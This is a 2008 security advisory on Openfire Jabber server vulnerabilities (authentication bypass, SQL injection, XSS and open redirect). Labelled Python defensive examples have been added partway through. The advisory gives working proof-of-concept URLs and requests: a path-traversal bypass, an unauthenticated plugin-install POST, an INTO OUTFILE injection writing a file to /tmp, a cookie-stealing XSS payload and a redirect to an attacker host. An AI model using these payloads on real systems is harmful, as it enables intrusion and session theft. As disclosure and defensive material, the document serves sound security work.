AKADV2008-001-v1.0.txt

2008-11-08T00:00:00
ID PACKETSTORM:71718
Type packetstorm
Reporter Andreas Kurtz
Modified 2008-11-08T00:00:00

Description

                                        
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256  
  
Advisory: Openfire Server Multiple Vulnerabilities  
Advisory ID: AKADV2008-001  
Release Date: 2008/11/07  
Revision: 1.0  
Last Modified: 2008/11/07  
Date Reported: 2008/05/17  
Author: Andreas Kurtz (mail at andreas-kurtz.de)  
Affected Software: Openfire Server <= 3.6.0a  
Remotely Exploitable: Yes  
Risk: Critical (x) High ( ) Medium ( ) Low ( )  
Vendor URL: http://www.igniterealtime.org  
http://www.jivesoftware.com/  
Vendor Status: No patch released yet.  
Patch development time: N/A  
  
  
Vulnerability description:  
- --------------------------  
  
The Jabber server Openfire (<= version 3.6.0a) contains several serious
vulnerabilities. Depending on the particular runtime environment, these
issues can even be used by an attacker to execute code at operating
system level.
  
1) Authentication bypass  
This vulnerability gives an attacker full access to all functions of the
admin web interface without providing any user credentials. The Tomcat
filter responsible for authentication can be completely circumvented.
  
2) SQL injection  
SQL statements can be passed to the backend database through a SQL
injection vulnerability. Depending on the particular runtime environment
and database permissions, it is even possible to write files to disk and
execute code at operating system level.
  
3) Multiple Cross-Site Scripting  
Permits arbitrary insertion of HTML and JavaScript code in login.jsp.
An attacker could also manipulate a parameter to specify a destination
to which a user will be forwarded after successful authentication.
  
  
Technical details:  
- ------------------  
  
1) Authentication bypass  
Authentication to the Openfire admin interface is secured by a filter in
the Tomcat application server (org.jivesoftware.admin.AuthCheckFilter).
This filter ensures that access to the admin interface is only granted
to authenticated users; everyone else is redirected to a login page.
  
A design error in Openfire enables access to internal functions  
without the need for admin user credentials.  
The deployment descriptor (web.xml) configures some exclude values  
for the AuthCheckFilter:  
  
<filter>
  <filter-name>AuthCheck</filter-name>
  <filter-class>org.jivesoftware.admin.AuthCheckFilter</filter-class>
  <init-param>
    <param-name>excludes</param-name>
    <param-value>login.jsp,index.jsp?logout=true,setup/index.jsp,
setup/setup-,.gif,.png,error-serverdown.jsp</param-value>
  </init-param>
</filter>
  
When a request URL contains one of these exclude strings, the auth check
is skipped entirely. This was considered necessary for the initial setup
process and the presence plugin. The following POC demonstrates how an
attacker could reach internal functions by placing one of these excludes
(/setup/setup-/../../) in the URL:

http://www.foo.bar:9090/setup/setup-/../../log.jsp?log=info&mode=asc&lines=All
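The root cause above is a substring match on the raw request URL. The following added example (written for this edit; it is not the advisory's or Openfire's code, and the matching logic of the real AuthCheckFilter is not quoted on the page, so the weak check is a model of the described behaviour) shows that check beside a hardened one that resolves "." and ".." first and matches each exclude entry against the canonical path only, plus a helper that flags the traversal pattern when reviewing access logs. The exclude list is the one from the web.xml quoted above.

```python
from posixpath import normpath
from urllib.parse import urlsplit

# Exclude list as configured for AuthCheckFilter in the web.xml quoted above.
EXCLUDES = [
    "login.jsp", "index.jsp?logout=true", "setup/index.jsp",
    "setup/setup-", ".gif", ".png", "error-serverdown.jsp",
]


def is_excluded_substring(request_url):
    """Model of the weak check: the raw request URL merely has to *contain* one
    of the exclude strings for the authentication filter to be skipped. The exact
    Java matching code is not on the page; this mirrors the behaviour it describes."""
    return any(ex in request_url for ex in EXCLUDES)


def canonical_path(request_url):
    """Normalized path relative to the context root, with '.' and '..' segments
    resolved, so traversal cannot disguise the real target."""
    path = urlsplit(request_url).path or "/"
    if not path.startswith("/"):
        path = "/" + path
    return normpath(path).lstrip("/")      # '/setup/setup-/../../log.jsp' -> 'log.jsp'


def is_excluded_hardened(request_url):
    """Hardened check (hypothetical replacement, not Openfire's code): excludes are
    matched against the canonical path only, with the matching mode that each
    entry's shape implies, never as a substring of the raw URL."""
    path = canonical_path(request_url)
    query = urlsplit(request_url).query
    for ex in EXCLUDES:
        if ex.startswith("."):                 # static-resource extension
            if path.endswith(ex):
                return True
        elif "?" in ex:                        # entry that includes a query string
            ex_path, ex_query = ex.split("?", 1)
            if path == ex_path and query == ex_query:
                return True
        elif ex.endswith("-"):                 # prefix entry such as 'setup/setup-'
            if path.startswith(ex):
                return True
        elif path == ex:                       # exact page name
            return True
    return False


def looks_like_exclude_bypass(request_url):
    """Log-review helper: true when the raw URL would have satisfied the substring
    check but its canonical path is not actually an excluded resource, which is
    the signature of the traversal trick in the POC above."""
    return is_excluded_substring(request_url) and not is_excluded_hardened(request_url)
```

Running both checks over the POC URL shows the difference: the substring check lets it through, the canonical-path check does not, and looks_like_exclude_bypass() returns True, which is the condition worth alerting on in web server logs of an unpatched installation.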
  
2) SQL injection  
The parameter "type" in sipark-log-summary.jsp is prone to  
SQL injection. Untrusted user data enters the application in  
sipark-log-summary.jsp (line 163):  
  
String type = ParamUtils.getParameter(request, "type");  
  
The function getCalls() in org.jivesoftware.openfire.sip.calllog.CallLogDAO  
processes this user input (SQLCondition) and constructs a SQL statement:  
  
String sql = "SELECT * FROM sipPhoneLog";  
  
sql = SQLCondition != null && !SQLCondition.equals("") ?  
sql + " WHERE " + SQLCondition : sql;  
  
sql += " ORDER BY datetime DESC";  
  
That statement is executed in the method  
createScrollablePreparedStatement()  
in CallLogDAO (line 411):  
  
return con.prepareStatement(sql);  
  
In this case a SQL injection vulnerability is present even though
prepared statements are used, because the string sql is dynamically
concatenated *before* it is passed to the prepared statement object.
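To make the point about prepared statements concrete, here is an added example (not code from the advisory or from Openfire) that mirrors the quoted getCalls() construction in Python against an in-memory SQLite table and puts a fixed version beside it. The table columns, the "calltype" condition and the allowed values of "type" are assumptions standing in for the real sipark schema, which the page does not show.

```python
import sqlite3


def build_calls_sql(sql_condition):
    """Mirror of the statement construction quoted from CallLogDAO.getCalls():
    the WHERE clause is concatenated into the SQL text, so by the time
    prepareStatement() receives it the injection has already happened."""
    sql = "SELECT * FROM sipPhoneLog"
    if sql_condition:                  # Java: SQLCondition != null && !SQLCondition.equals("")
        sql = sql + " WHERE " + sql_condition
    sql += " ORDER BY datetime DESC"
    return sql


def make_sample_db():
    """Constructed in-memory sample table; the column names are assumptions,
    not Openfire's real sipPhoneLog schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sipPhoneLog (username TEXT, calltype TEXT, datetime INTEGER)")
    con.executemany("INSERT INTO sipPhoneLog VALUES (?, ?, ?)", [
        ("alice", "received", 1000),
        ("bob", "dialed", 1001),
        ("carol", "received", 1002),
    ])
    return con


def get_calls_vulnerable(con, type_param):
    """Hypothetical caller standing in for sipark-log-summary.jsp: the 'type'
    request parameter is pasted into the condition string unchanged."""
    condition = "" if type_param == "all" else "calltype = '" + type_param + "'"
    return con.execute(build_calls_sql(condition)).fetchall()


# Allowlist of request values and the bound value each maps to (None = no filter).
ALLOWED_TYPES = {"all": None, "received": "received", "dialed": "dialed"}


def is_allowed_type(type_param):
    return type_param in ALLOWED_TYPES


def get_calls_hardened(con, type_param):
    """Hardened version: the parameter is allowlisted and bound as a placeholder,
    so the SQL text is constant no matter what the request carries."""
    if not is_allowed_type(type_param):
        raise ValueError("unsupported call type")
    value = ALLOWED_TYPES[type_param]
    if value is None:
        return con.execute("SELECT * FROM sipPhoneLog ORDER BY datetime DESC").fetchall()
    return con.execute(
        "SELECT * FROM sipPhoneLog WHERE calltype = ? ORDER BY datetime DESC", (value,)
    ).fetchall()
```

The vulnerable path returns no rows for a type value that does not exist, but a value ending the quoted literal early and appending a tautology returns the whole table, because the quoting was decided by the request rather than by the driver. The hardened path never lets the request touch the SQL text.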
  
3) Cross-Site Scripting  
The parameter "url" in login.jsp was vulnerable to Cross-Site Scripting
(XSS). This vulnerability is the only one that was fixed within the last
6 months.

http://www.foo.bar:9090/login.jsp?url="/><script>alert(document.cookie);</script>
  
An attacker could also manipulate the parameter to specify a destination
to which a user will be forwarded after successful authentication:

http://www.foo.bar:9090/login.jsp?url=http://www.attacker.com/StealSession

If a user authenticates using that link, it is easy for an attacker to
hijack the user's session.
  
Furthermore the parameter "username" in login.jsp is still vulnerable  
to Cross-Site Scripting attacks.  
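The two defects in the "url" parameter are an unescaped echo into the page and an unvalidated redirect target. The added example below (not from the advisory or from Openfire; the default landing page "/index.jsp" and the hidden-field rendering are assumptions) shows the two server-side checks a login page needs: only same-application paths are accepted as the post-login destination, and anything echoed back is attribute-escaped.

```python
import html
from urllib.parse import urlsplit, urlunsplit

DEFAULT_TARGET = "/index.jsp"   # assumed landing page; not taken from the advisory


def safe_redirect_target(url_param, default=DEFAULT_TARGET):
    """Accept a post-login destination only if it is a path inside this
    application. Anything with a scheme or host ('http://www.attacker.com/...',
    '//host/...'), a backslash, control characters, or a path that does not begin
    with a single '/' falls back to the default."""
    if not url_param:
        return default
    if any(ord(c) < 0x20 or c in " \\" for c in url_param):
        return default                         # CRLF, spaces, backslash-as-slash tricks
    parts = urlsplit(url_param)
    if parts.scheme or parts.netloc:
        return default                         # absolute or scheme-relative URL
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))   # fragment dropped


def render_hidden_field(name, value):
    """Echo a request value into the login form the safe way: attribute-escaped,
    so a value like '\"/><script>...' stays inert text instead of closing the
    attribute and the tag."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))
```

With these two functions in place, both URLs quoted above degrade harmlessly: the XSS payload is rendered as escaped text, and the external redirect target is replaced by the application's own landing page.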
  
  
Putting it all together:  
- ------------------------  
  
Since the SIP plugin is deactivated by default, an attacker needs to
install it using the authentication bypass vulnerability and the
following POST request:

POST http://www.foo.bar:9090/setup/setup-/../../dwr/exec/downloader.installPlugin.dwr HTTP/1.1
Host: www.foo.bar:9090

callCount=1
c0-scriptName=downloader
c0-methodName=installPlugin
c0-id=7931_1210973487852
c0-param0=string:http%3A%2F%2Fwww.igniterealtime.org%2Fprojects%2Fopenfire%2Fplugins%2Fsip.jar
c0-param1=string:661780277
xml=true
  
After that activation, the described SQL injection vulnerability can be
exploited in a single unauthenticated request. The following proof of
concept uses a MySQL database:

http://www.foo.bar:9090/setup/setup-/../../plugins/sip/sipark-log-summary.jsp?type=all'UNION%20SELECT%20'attack-code'%20INTO%20OUTFILE%20'/tmp/attack.sh'%20/*&startDate=Any&endDate=Any&submit=true&get=Search
  
  
Solution:  
- ---------  
  
Since the vendor has not released a patch within the last 6 months, it is
highly recommended to disable access to the entire admin interface.
This can be achieved, for example, by blocking the corresponding ports
(tcp/9090 and tcp/9091 by default) with a firewall. Subsequent access to
the admin interface can then be done via SSL tunnels.
  
For more details see: http://www.andreas-kurtz.de/archives/63  
  
  
History:  
- --------  
  
2008/05/17 - Vendor notified using sales@jivesoftware.com  
2008/05/18 - Vendor notified using gaston@jivesoftware.com  
2008/05/20 - Vendor response  
2008/05/20 - Detailed vulnerability information sent to the vendor  
2008/05/21 - Vendor confirms the vulnerability  
2008/08/18 - Asked vendor for up to date information regarding the  
reported issues  
2008/10/18 - Again asked vendor for up to date information regarding the  
reported issues  
2008/10/31 - Informed vendor of planned advisory release on 2008/11/05
(no response)  
2008/11/07 - Full technical details and recommended measures released to  
general public  
  
  
Credits:  
- --------  
  
Vulnerability found and advisory written by Andreas Kurtz.  
  
  
References:  
- -----------  
  
http://www.andreas-kurtz.de/archives/63  
  
  
Changes:  
- --------  
  
Revision 0.1 - Initial draft release to the vendor  
Revision 1.0 - Final version released to general public  
  
  
Disclaimer:  
- -----------  
  
The information within this advisory may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are no warranties, implied or express, with regard  
to this information. In no event shall the author be liable for any  
direct or indirect damages whatsoever arising out of or in connection  
with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
  
PGP Key:  
- --------  
  
http://www.andreas-kurtz.de/ak-pubkey.asc  
  
Copyright 2008 Andreas Kurtz. All rights reserved.  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP Desktop 9.9.0 (Build 397)  
Charset: utf-8  
  
wsBVAwUBSRQVbXDQzpO427ITAQgGFAgAvxGItsFtfHEn1TLcVne2V3lCvX8GNOCN  
3992EHNogahFXtIlgjG+cZl9nUZ5uIKiIUnv2LTwsGaQgYB6N8hxGMZr0bTIFlXP  
ZcAhMwn2bwYmocUGKxFO2+2wqFRKH5HYP9scvKRGZtm5m2JD37jQmKlR+2i+/4SY  
cwfUXfe+3ZNJcThVhN/B/+nN3jV7rSW8stj9J/uGZG91OUUlfJHTlUvNlmhO0JYd  
xIWiFl54XGkw2jmBkgJFQUa4eucbjxCGcxdgyECRH1eDiOjr97ATxpy+iAYMbs3R  
zdNOywO6stb+Ck1eB5d+7YKbd919AKuANU9sF2OI/sID1MjvpmrNcg==  
=iZdK  
-----END PGP SIGNATURE-----  
  